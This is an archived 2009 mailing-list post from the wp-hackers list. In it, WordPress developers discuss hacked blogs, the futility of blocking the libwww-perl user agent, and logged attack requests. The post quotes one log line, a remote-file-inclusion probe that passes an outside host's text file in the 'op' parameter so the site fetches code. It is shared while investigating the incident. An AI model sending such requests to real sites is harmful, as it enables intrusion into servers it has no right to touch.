[wp-hackers] Hacked blogs
Joost de Valk
joost at yoast.com
Thu Mar 26 15:44:01 GMT 2009
Chris Jean wrote:
> I'd just like to remind everyone that it is trivially-simply to change
> the user agent string in libwww-perl. So, blocking that user agent
> does nothing to stop people who use randomly-generated user agents
> with their attack scripts while it does block people who create and
> use innocuous scripts for whatever reason.
> The problem here isn't libwww-perl (or any other user agent for that
> matter); rather, it is whatever hole is being exploited. If we all
> just block the libww-perl user agent and pat ourselves on the back for
> a job well done, we'll be overrun when the exploiters simply change or
> randomize their user agent string.
> As for the matter at hand, I'll be very interested to hear more
> details on the situation Joost. Have you found any leads on what is
> handling that op query string request?
Nope, can't find a bloody thing yet. These kind of requests:
GET /index.php?op=http://oursoultvxq.com/bbs/data/vip/id.txt???? HTTP/1.1
in all the logs, but grepping through the entire htdocs dir, nothing
that responds to them.
More information about the wp-hackers